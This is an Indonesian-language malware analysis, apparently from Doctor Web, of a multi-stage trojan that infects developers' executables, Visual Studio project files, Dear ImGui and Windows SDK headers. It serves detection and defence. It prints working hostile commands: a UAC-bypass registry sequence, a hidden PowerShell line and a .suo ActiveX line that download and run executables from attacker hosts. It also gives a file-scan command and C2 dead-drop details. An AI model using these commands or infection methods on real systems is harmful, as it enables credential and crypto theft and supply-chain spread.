Targetnya Developer: Trojan Baru Serang Supply Chain dan Picu Kerusakan Ganda pada PC Korban
Kasus penyebaran awal dari trojan ini mulai terdeteksi pada kuartal terakhir tahun 2025, dan sejak saat itu, pengembangnya terus melakukan modifikasi secara berkala. Jalur penyebaran utamanya di internet adalah melalui berkas eksekusi (.exe) dan berkas Python yang telah terinfeksi. Proses infeksi yang dilakukan beralur multi-stage. Mari kita bedah jalannya setiap tahapan beserta tujuannya satu per satu.
Tahap 1. Trojan.DownLoader49.35384
Para pakar dari "Doctor Web" menemukan banyak aplikasi legitimate yang telah terinfeksi dengan struktur serupa. Sebuah objek global ditambahkan ke dalam berkas eksekusi asli, dan eksekusi aplikasi yang telah disisipi trojan tersebut dimulai dengan memperoleh akses ke sistem API melalui metode PEB walking. Selanjutnya, fungsi standar initterm akan menelusuri function pointer table dan menginisialisasinya, di mana salah satu dari fungsi tersebut bersifat malicious dan menjalankan perintah PowerShell. Pada beberapa versi trojan, payload ini disimpan dalam bentuk terenkripsi.

Dijalankan melalui initterm
Perintah PowerShell tersebut mengunduh dan mengeksekusi berkas berbahaya Trojan.DownLoader49.35687, yang menandai dimulainya tahap kedua

Perintah PowerShell berbahaya
Selain berkas eksekusi, ditemukan juga berkas dalam bahasa Python (Python.Downloader.255). Di dalamnya, kode berbahaya yang sama dienkripsi menggunakan mekanisme enkripsi simetris Fernet. Kode tersebut disembunyikan di balik obfuskasi sederhana, yaitu berupa deretan spasi yang banyak pada baris pertama. Dalam kasus ini, proses eksekusi juga berlangsung dalam beberapa tahap.

Berkas Python berbahaya
Tahap 2. Trojan.DownLoader49.35687
Pada tahap ini, trojan Trojan.DownLoader49.35687 melakukan pengecekan apakah dirinya dijalankan di dalam sandbox. Selain itu, trojan ini membuat objek sinkronisasi mutex dengan nama Global\PFNMX (nilai tetap). Contoh dari objek tersebut adalah: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. Dengan cara ini, trojan dapat memastikan apakah salinan dirinya yang lain sudah berjalan sebelumnya di komputer tersebut atau belum.
Selama tahap kedua, trojan mencoba mendapatkan alamat server C2 dengan memanfaatkan repositori publik GitHub dan platform game Steam. Di platform tersebut, para penjahat siber meninggalkan domain-domain tertentu yang kemudian dibaca oleh trojan dan digunakan sebagai URL untuk mengunduh tahap ketiga — yaitu trojan BackDoor.Siggen2.5906.
Akun-akun Steam yang dibuat oleh penjahat siber tersebut memuat nama domain dalam bentuk plaintext.

Akun Steam dengan domain C2
Pada GitHub, para penjahat siber menyimpan alamat domain C2 yang terenkripsi dalam bentuk raw file: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Trojan mengunduh berkas ini dan mendekripsinya, pertama-tama melalui Base64, kemudian menggunakan operasi XOR dengan kunci ZwFlushKey.

Domain yang terenkripsi
Setelah mengunduh tahap berikutnya, Trojan.DownLoader49.35687 menyuntikkannya (inject) ke dalam proses dari salah satu dari 41 berkas eksekusi yang telah ditentukan sebelumnya di dalam direktori C:\Windows\System32.
Alamat domain C2 yang berhasil tersambung akan ditambahkan ke dalam deretan karakter yang telah hardcoded di dalam trojan, lalu diteruskan ke tahap berikutnya melalui named pipe pipe\VccFramework.
Tahap 3. BackDoor.Siggen2.5906
Pada tahap inilah aktivitas berbahaya yang utama terjadi. BackDoor.Siggen2.5906 membuat objek sinkronisasi mutex dengan nama tetap berformat Global\PFNX_Side (nilai tetap). Kemudian, melalui channel yang telah dibuat sebelumnya, trojan menerima data dari tahap kedua, lalu mengekstrak pengidentifikasi trojan serta domain C2 yang akan menjadi jalur komunikasi bagi BackDoor.Siggen2.5906.
Untuk mempertahankan posisi di dalam sistem, trojan mengunduh berkas bernama "bungee.boo" yang menjalankan fungsi dari tahap 2 — yaitu Trojan.DownLoader49.35687 — dan menggunakannya untuk menggantikan berkas-berkas DLL berikut:
- «profapi.dll» aplikasi Discord,
- «domain_actions.dll» di folder «Domain Actions» dan «well_known_domains.dll» di folder «Well Known Domains» aplikasi Microsoft Edge,
- «C:\Windows\omadmapi.dll».
Selain itu, BackDoor.Siggen2.5906 dapat memodifikasi Windows Registry sedemikian rupa, sehingga ketika pengguna membuka berkas arsip menggunakan WinRar.exe, kode berbahaya tersebut akan ikut tereksekusi.
Untuk menjalankan tindakan dengan hak akses administrator, trojan ini menggunakan teknik bypass UAC (User Account Control). Malware tersebut membuat sebuah berkas .vbs dengan nama berupa angka acak, di mana di dalamnya disisipkan perintah untuk dieksekusi menggunakan hak akses administrator. Selanjutnya, perintah-perintah berikut dijalankan melalui cmd.exe:
[code]reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe[/code]
Setelah itu, trojan akan menjalankan 5 fungsi berbahaya sekaligus: stealer, clipper, backdoor, miner, dan agen penyebar file infector.
Stealer
Trojan ini mampu mencuri berbagai macam informasi, antara lain:
- token Discord, yang memungkinkan pelaku untuk masuk ke akun orang lain tanpa harus memasukkan username dan password;
- Kata sandi dan cookie dari browser seperti Chrome, Edge, Opera, Brave, Yandex, dan lainnya. Selain menggunakan teknik ekstraksi data standar, trojan ini juga dapat memanfaatkan berkas CCCWF.tmp (Trojan.PWS.Siggen5.33623). Berkas ini menyuntikkan diri ke dalam peramban, lalu membaca kata sandi yang tersimpan dan menyimpannya ke dalam berkas teks;
- folder Telegram Desktop;
- folder dompet kripto Exodus.
Selain mencuri folder Exodus, trojan ini juga melakukan modifikasi pada dompet kripto tersebut. Untuk melancarkan aksinya, trojan akan mencari berkas app.asar dan menggantinya dengan salinan yang diunduh dari URL balista[.]lol/Stb/PokerFace/RTApp[.]txt menggunakan perintah curl. Di dalam versi yang telah dipalsukan tersebut, tepatnya pada bagian index.js (Trojan.Siggen32.44702), terdapat fungsi unlock() yang apabila dijalankan akan mengirimkan frasa mnemonik (mnemonic phrases/seed phrase) dari dompet tersebut ke server penjahat siber.

Berkas index.js yang telah dipalsukan
Clipper
Fungsi trojan yang sangat berbahaya. Malware ini terus-menerus memantau clipboard pengguna: mencari data kartu kredit/debit, lalu mengirimkannya ke server penjahat siber. Selain itu, malware ini juga mengganti alamat dompet kripto yang disalin dengan alamat palsu yang diperoleh dari server C2.
Backdoor
Fungsionalitas trojan ini memungkinkan penjahat siber untuk mengendalikan PC yang terinfeksi secara remote menggunakan perintah-perintah berikut:
exc | mengunduh berkas dari URL menggunakan curl dan menjalankannya |
RVRS | menjalankan Reverse Proxy |
RUNCMD | menjalankan perintah melalui cmd |
GETFILE | mengunggah konten dari berkas tertentu ke server pengendali |
LISTDIR | mengirimkan daftar berkas dari direktori komputer tertentu ke server pengendali |
TROLL | menjalankan perintah untuk menjahili (trolling) pengguna, dengan opsi yang tersedia antara lain: earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer dll. |
Miner
Menggunakan perintah curl, trojan mengunduh dari server dan menjalankan berkas https://files[.]catbox[.]moe/lvh9j3[.]bin — yaitu Trojan.Packed2.50953. Secara struktur dan perilakunya, berkas ini mirip dengan tahap 2, hanya saja alih-alih mengunduh BackDoor.Siggen2.5906, berkas ini mengunduh dan menyuntikkan Trojan.BtcMine.3956. Penambang kripto (miner) ini hanya akan berjalan setelah komputer berada dalam kondisi menganggur selama periode tertentu. Malware ini menggunakan alat open-source XMRig, T-Rex dan TeamRedMiner.
Infeksi Berkas (File Infection)
Ciri khas utama dari trojan ini adalah kemampuannya untuk menginfeksi berkas dan menyebar secara mandiri. Berikut adalah daftar berkas yang menjadi target infeksi:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj dan .csproj.
Untuk menentukan jalur menuju berkas yang dapat diinfeksi, trojan memindai seluruh kandar satu per satu dan mengeksekusi sebuah perintah. Sebagai contoh, berikut adalah perintah untuk kandar:
[code]dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.[/code]
Para penjahat siber sengaja memanfaatkan skenario di mana para pengembang mempublikasikan proyek mereka yang telah disisipi kode berbahaya tersebut ke publik (repositori terbuka). Pengembang lain yang nantinya merakit, mengompilasi, atau memodifikasi proyek tersebut akan secara otomatis menginfeksi komputer mereka sendiri akibat adanya berkas .suo, .vcxproj, dan .csproj berbahaya. Sementara itu, pengguna awam juga berisiko mengeksekusi berkas kompilasi (.exe) yang dibuat menggunakan perkakas pengembangan yang telah disusupi tersebut.
Berkas imgui_impl_win32.cpp. Trojan.Loader.3129
Berkas imgui_impl_win32.cpp adalah bagian dari Dear ImGui, sebuah pustaka populer yang berfungsi untuk menangani antarmuka grafis (GUI) pada bahasa pemrograman C++. Trojan menyuntikkan dua baris kode ke dalam berkas tersebut: baris pertama berisi muatan berbahaya, sedangkan baris kedua berfungsi untuk mengeksekusinya.

Baris kode yang berisi payload

Baris kode yang mengeksekusi payload
Hasil akhirnya:
[code] start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" [/code]
Dengan demikian, pustaka tersebut telah terinfeksi, sehingga aplikasi C++ apa pun yang dibuat oleh pengguna akan mengandung kode berbahaya di dalamnya. Ketika aplikasi-aplikasi tersebut dibagikan atau diunduh oleh orang lain, infeksi akan terus menyebar lebih luas.
Berkas .suo. Trojan.Loader.3138
Ini adalah ekstensi berkas untuk lingkungan pengembangan Microsoft Visual Studio. Berkas-berkas tersebut menyimpan pengaturan pengguna untuk proyek-proyek tertentu. Trojan mengganti berkas asli dengan versi terinfeksi yang diperoleh dari server C2.

Berkas yang telah terinfeksi
Akibatnya, saat proyek dibuka di Visual Studio, kode berbahaya tersebut akan langsung tereksekusi:
[code] javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); [/code].
Berkas winnetwk.h. Trojan.Loader.3184
Windows SDK adalah paket perkakas resmi dari Microsoft yang memungkinkan pembuatan aplikasi untuk OS Windows.
Dengan memanfaatkan registri, trojan dapat menemukan direktori tempat Windows SDK terpasang. Di dalam direktori tersebut, trojan akan mencari berkas winnetwk.h yang bertanggung jawab atas pengelolaan sumber daya jaringan. Setelah ditemukan, kode berbahaya akan disisipkan ke dalam berkas tersebut.

Berkas winnetwk.h yang telah terinfeksi
Setelah proses ini, semua program yang dibuat menggunakan winnetwk.h akan mengandung kode berbahaya yang berfungsi untuk menjalankan tahap 2.
Berkas .exe
Trojan akan mencari berkas .exe yang cocok, lalu menyuntikkan fungsi inisialisasi API dan eksekusi initterm ke dalamnya. Setelah itu, berkas tersebut akan mulai beroperasi sebagai Trojan.DownLoader49.35384, atau yang dikenal sebagai tahap 1.
Berkas .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) dan .csproj (Trojan.Loader.3126)
Ini adalah berkas proyek Visual Studio untuk bahasa pemrograman C++ dan C#. Ke dalam berkas-berkas tersebut, ditambahkan perintah PreBuildEvent yang akan dieksekusi sebelum proses merakit (build) proyek dimulai. Versi awal dari trojan ini menyisipkan kode yang mirip dengan tahap 1.

Versi kode awal
Pada versi yang lebih baru, kode menjadi lebih rumit karena adanya teknik obfuskasi (obfuscation) tambahan.

Versi kode baru

Salah satu tahap eksekusi Trojan.Loader.3128
Akibat perintah tersebut, sebuah berkas .vbs berbahaya akan dibuat di dalam sistem, yang kemudian berfungsi untuk menjalankan PowerShell payload. Trojan ini membuat permintaan ke beberapa URL berikut:
- youtu.be/akoxddx6lgc,
- steamcommunity.com/profiles/76561198737324192.
Di alamat-alamat tersebut, tersimpan URL lain yang dienkripsi menggunakan Base64.

Akun YouTube yang memuat URL terenkripsi
Setelah proses dekripsi, trojan akan mendapatkan domain C2 yang kemudian diakses untuk mengunduh payload yang mirip dengan tahap 2.
Deskripsi cara kerja trojan ini menunjukkan bahwa ia memiliki tingkat bahaya yang tinggi karena mengombinasikan berbagai fungsi berbahaya sekaligus. Untuk menghindari infeksi pada komputer Anda serta mencegah penyebaran trojan lebih lanjut, kami merekomendasikan untuk memperbarui basis data antivirus secara berkala dan memeriksa semua berkas yang diunduh dari internet. Pengguna antivirus Dr.Web Security Space dan Dr.Web Desktop Security Suite tidak perlu khawatir, karena trojan ini dapat dideteksi dan dihapus secara tuntas oleh antivirus Dr.Web. Berkas dengan format .vcxproj, .csproj, dan imgui dapat disembuhkan dengan cara membersihkan kode berbahaya yang ada di dalamnya.